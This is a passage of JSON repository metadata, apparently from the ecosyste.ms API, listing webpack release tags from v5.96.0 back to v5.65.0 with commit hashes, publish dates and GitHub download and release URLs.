s/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/